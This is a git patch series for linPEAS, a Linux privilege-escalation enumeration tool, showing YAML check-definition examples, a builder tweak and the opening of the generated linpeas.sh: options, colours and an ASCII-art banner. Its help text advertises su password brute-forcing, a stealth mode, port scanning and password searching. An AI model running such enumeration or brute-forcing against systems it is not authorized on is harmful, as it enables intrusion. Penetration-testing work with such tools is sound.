'"path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts"' +# remove_regex: '\W+\#|^#' +# type: f +# search_in: +# - common + + + +#-) In the following example Apache searches are performed: +## - auto_check is True (by default set it always to True) +## - exec is and array of sh commands to execute during the check +## - The directory "sites-enabled" is searched +### - type is d (dir) +### - search_in is "common", so look for this file in common directories +#### Inside this directory the file "*" is searched (in this case "*" will get all the files, but more specific regex can be used) +##### - bad_regex indicates the content of the file that if found is going to be written in red in the output +##### - only_bad_lines indicate that only lines that contains the regex indicated in bad_regex are going to be printed +##### - remove_empty_lines is True, this indicates that empty lines of the file aren't going to be written in the output +##### - remove_regex is a regex to avoid printing lines where the regex is found + +#- name: Apache +# value: +# config: +# auto_check: True +# exec: +# - 'echo "Version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)"' +# - "print_3title 'PHP exec extensions'" +# - 'grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null' +# +# files: +# - name: "sites-enabled" +# value: +# type: d +# files: +# - name: "*" +# value: +# bad_regex: "AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" +# only_bad_lines: True +# remove_empty_lines: True +# remove_regex: '^#' +# search_in: +# - common + + + +############################### +## Files & folders to search ## +############################### + search: - name: Systemd value: diff --git a/linPEAS/builder/src/linpeasBuilder.py b/linPEAS/builder/src/linpeasBuilder.py index 6d51952..076eb24 100644 --- a/linPEAS/builder/src/linpeasBuilder.py +++ b/linPEAS/builder/src/linpeasBuilder.py @@ -46,7 +46,7 @@ class LinpeasBuilder: assert s in self.bash_storages, f"{s} isn't created" #Replace interesting hidden files markup for a list of all the serched hidden files - self.__replace_mark(INT_HIDDEN_FILES_MARKUP, self.hidden_files, "|") + self.__replace_mark(INT_HIDDEN_FILES_MARKUP, sorted(self.hidden_files), "|") #Check if there are duplicate peass marks peass_marks = self.__get_peass_marks() From cf97b2396b6119b277db57619dc4af1438ff3970 Mon Sep 17 00:00:00 2001 From: CI-linpeas-ubuntu <> Date: Tue, 13 Jul 2021 10:04:18 +0000 Subject: [PATCH 4/7] linpeas.sh auto update --- linPEAS/linpeas.sh | 3295 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3295 insertions(+) create mode 100755 linPEAS/linpeas.sh diff --git a/linPEAS/linpeas.sh b/linPEAS/linpeas.sh new file mode 100755 index 0000000..7ba1612 --- /dev/null +++ b/linPEAS/linpeas.sh @@ -0,0 +1,3295 @@ +#!/bin/sh + +VERSION="ng" +ADVISORY="This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission." + +########################################### +#-------) Checks pre-everything (---------# +########################################### +if [ "$(/usr/bin/id -u)" -eq "0" ]; then + IAMROOT="1" + MAXPATH_FIND_W="3" +else + IAMROOT="" + MAXPATH_FIND_W="7" +fi + + +########################################### +#---------------) Colors (----------------# +########################################### + +C=$(printf '\033') +RED="${C}[1;31m" +SED_RED="${C}[1;31m&${C}[0m" +GREEN="${C}[1;32m" +SED_GREEN="${C}[1;32m&${C}[0m" +YELLOW="${C}[1;33m" +SED_YELLOW="${C}[1;33m&${C}[0m" +SED_RED_YELLOW="${C}[1;31;103m&${C}[0m" +BLUE="${C}[1;34m" +SED_BLUE="${C}[1;34m&${C}[0m" +ITALIC_BLUE="${C}[1;34m${C}[3m" +LG="${C}[1;37m" #LightGray +SED_LG="${C}[1;37m&${C}[0m" +DG="${C}[1;90m" #DarkGray +SED_DG="${C}[1;90m&${C}[0m" +NC="${C}[0m" +UNDERLINED="${C}[5m" +ITALIC="${C}[3m" + + +########################################### +#---------) Parsing parameters (----------# +########################################### +# --) FAST - Do not check 1min of procceses and su brute +# --) SUPERFAST - FAST & do not search for special filaes in all the folders + +if [ "`uname 2>/dev/null | grep 'Darwin'`" ] || [ "`/usr/bin/uname 2>/dev/null | grep 'Darwin'`" ]; then MACPEAS="1"; else MACPEAS=""; fi +FAST="1" #By default stealth/fast mode +SUPERFAST="" +NOTEXPORT="" +DISCOVERY="" +PORTS="" +QUIET="" +CHECKS="SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles" +WAIT="" +PASSWORD="" +NOCOLOR="" +VERBOSE="" +THREADS="`((grep -c processor /proc/cpuinfo 2>/dev/null) || ((command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n"`" +[ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2 +[ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2 +[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #It THREADS is not a number, put number 2 +HELP=$GREEN"Enumerate and search Privilege Escalation vectors. +${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors. + ${YELLOW}-h${BLUE} To show this message + ${YELLOW}-q${BLUE} Do not show banner + ${YELLOW}-a${BLUE} All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly + ${YELLOW}-s${BLUE} SuperFast (don't check some time consuming checks) - Stealth mode + ${YELLOW}-w${BLUE} Wait execution between big blocks + ${YELLOW}-n${BLUE} Do not export env variables related with history and do not check Internet connectivity + ${YELLOW}-N${BLUE} Do not use colours + ${YELLOW}-v${BLUE} Verbose execution + ${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' + ${YELLOW}-o${BLUE} Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. + ${YELLOW}-L${BLUE} Force linpeas execution. + ${YELLOW}-M${BLUE} Force macpeas execution. + ${YELLOW}-d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 + ${YELLOW}-p -d ${BLUE} Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports.$DG Ex: -d 192.168.0.1/24 -p 53,139 + ${YELLOW}-i [-p ]${BLUE} Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 + $GREEN Notice${BLUE} that if you select some network action, no PE check will be performed$NC" + +while getopts "h?asnd:p:i:P:qo:LMwNv" opt; do + case "$opt" in + h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;; + a) FAST="";; + s) SUPERFAST=1;; + n) NOTEXPORT=1;; + d) DISCOVERY=$OPTARG;; + p) PORTS=$OPTARG;; + i) IP=$OPTARG;; + P) PASSWORD=$OPTARG;; + q) QUIET=1;; + o) CHECKS=$OPTARG;; + L) MACPEAS="";; + M) MACPEAS="1";; + w) WAIT=1;; + N) NOCOLOR="1";; + v) VERBOSE="1";; + esac +done + +if [ "$MACPEAS" ]; then SCRIPTNAME="macpeas"; else SCRIPTNAME="linpeas"; fi +if [ "$NOCOLOR" ]; then + C="" + RED="" + SED_RED="" + GREEN="" + SED_GREEN="" + YELLOW="" + SED_YELLOW="" + SED_RED_YELLOW="" + BLUE="" + SED_BLUE="" + ITALIC_BLUE="" + LG="" + SED_LG="" + DG="" + SED_DG="" + NC="" + UNDERLINED="" + ITALIC="" +fi + + +########################################### +#---------------) BANNER (----------------# +########################################### + +print_banner(){ + if [ "$MACPEAS" ]; then + bash -c "printf ' + \e[38;5;238;48;5;238m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;71m▓\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▓\e[38;5;119;48;5;71m▓\e[38;5;119;48;5;71m▓\e[38;5;119;48;5;71m \e[38;5;119;48;5;71m \e[38;5;119;48;5;71m \e[38;5;119;48;5;71m░\e[38;5;119;48;5;71m \e[38;5;119;48;5;71m \e[38;5;119;48;5;71m \e[38;5;119;48;5;71m\e[38;5;119;48;5;71m\e[38;5;119;48;5;71m▓\e[38;5;119;48;5;71m \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;239m▓\e[38;5;16;48;5;16m▓\e[38;5;244;48;5;244m▓\e[0m + \e[38;5;96;48;5;243m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;235m▒\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;22m \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;22m \e[38;5;22;48;5;232m \e[38;5;16;48;5;16m▓\e[38;5;22;48;5;16m \e[38;5;119;48;5;22m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;234m░\e[38;5;16;48;5;16m▓\e[38;5;96;48;5;245m▓\e[0m + \e[38;5;96;48;5;234m▓\e[38;5;22;48;5;16m \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;22;48;5;16m \e[38;5;22;48;5;16m \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;2m \e[38;5;119;48;5;22m \e[38;5;119;48;5;22m \e[38;5;119;48;5;22m \e[38;5;119;48;5;22m \e[38;5;119;48;5;22m \e[38;5;119;48;5;2m \e[38;5;119;48;5;28m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;40m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;34m░\e[38;5;22;48;5;232m \e[38;5;16;48;5;16m▓\e[38;5;119;48;5;237m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;235m▒\e[38;5;16;48;5;16m▓\e[0m + \e[38;5;16;48;5;16m▓\e[38;5;119;48;5;65m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;238m▒\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;239m▓\e[38;5;119;48;5;7m▓\e[38;5;230;48;5;231m \e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;101;48;5;254m▓\e[38;5;97;48;5;243m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;82;48;5;248m▓\e[38;5;119;48;5;238m▓\e[38;5;71;48;5;233m▒\e[38;5;119;48;5;22m \e[38;5;119;48;5;34m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;34m░\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;232m░\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[0m + \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;65m▒\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;151m▒\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;252;48;5;252m▓\e[38;5;251;48;5;251m▓\e[38;5;231;48;5;231m▓\e[38;5;239;48;5;239m▓\e[38;5;246;48;5;246m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;119;48;5;255m▒\e[38;5;119;48;5;59m▓\e[38;5;22;48;5;16m \e[38;5;16;48;5;16m \e[38;5;16;48;5;16m░\e[38;5;16;48;5;16m \e[38;5;16;48;5;16m▓\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[0m + \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;22;48;5;232m \e[38;5;119;48;5;245m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;243;48;5;242m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;255;48;5;255m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;151;48;5;255m▒\e[38;5;113;48;5;242m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;233m░\e[38;5;119;48;5;64m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[0m + \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;65m▒\e[38;5;114;48;5;16m▒\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;233;48;5;233m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;119;48;5;237m▓\e[38;5;22;48;5;232m \e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[0m + \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;22m▒\e[38;5;60;48;5;240m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;240;48;5;240m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;145;48;5;248m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;119;48;5;240m▓\e[38;5;119;48;5;235m▒\e[38;5;119;48;5;235m▒\e[0m + \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;252m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;238;48;5;238m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;255;48;5;255m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;119;48;5;233m▒\e[38;5;119;48;5;236m▒\e[0m + \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;232m▒\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;82;48;5;231m \e[38;5;108;48;5;255m▓\e[38;5;119;48;5;188m▓\e[38;5;119;48;5;251m▓\e[38;5;119;48;5;253m▓\e[38;5;65;48;5;255m▓\e[38;5;65;48;5;231m▓\e[38;5;230;48;5;231m \e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;65;48;5;248m▓\e[38;5;119;48;5;233m░\e[0m + \e[38;5;16;48;5;16m▓\e[38;5;119;48;5;150m▒\e[38;5;128;48;5;254m▓\e[38;5;65;48;5;242m▓\e[38;5;119;48;5;237m▓\e[38;5;119;48;5;22m \e[38;5;119;48;5;2m \e[38;5;119;48;5;34m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;28m \e[38;5;22;48;5;22m \e[38;5;119;48;5;234m░\e[38;5;119;48;5;235m▓\e[38;5;65;48;5;238m▓\e[38;5;119;48;5;245m▓\e[38;5;119;48;5;254m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;119;48;5;233m▓\e[0m + \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;28m \e[38;5;119;48;5;22m 